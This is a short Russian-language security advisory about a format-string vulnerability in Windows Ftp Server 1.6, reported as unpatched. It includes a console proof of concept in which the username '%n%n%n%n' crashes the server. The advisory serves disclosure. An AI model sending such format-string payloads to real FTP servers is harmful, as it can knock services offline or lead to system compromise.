Удаленное выполнение произволного кода в Windows Ftp Server

Дата публикации:
13.01.2004
Дата изменения:
16.10.2006
Всего просмотров:
1031
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Отказ в обслуживании
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Windows Ftp Server 1.x
Уязвимые версии: Windows Ftp Server 1.6

Описание: Уязвимость форматной строки обнаружена в Windows Ftp Server. Удаленный пользователь может выполнить произвольный код на целевой системе.

Сервер не определяет форматную строку при обработке данных, представленных пользователем в поле 'username'.

Пример/Эксплоит:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>ftp 127.0.0.1
Connected to 127.0.0.1.
220 Welcome to Windows FTP Server
User (127.0.0.1:(none)): %n%n%n%n
Connection closed by remote host.

C:\WINDOWS\system32>

URL производителя:http://srv.nease.net/index.htm

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Windows FTP Server Format String Vulnerability

или введите имя

CAPTCHA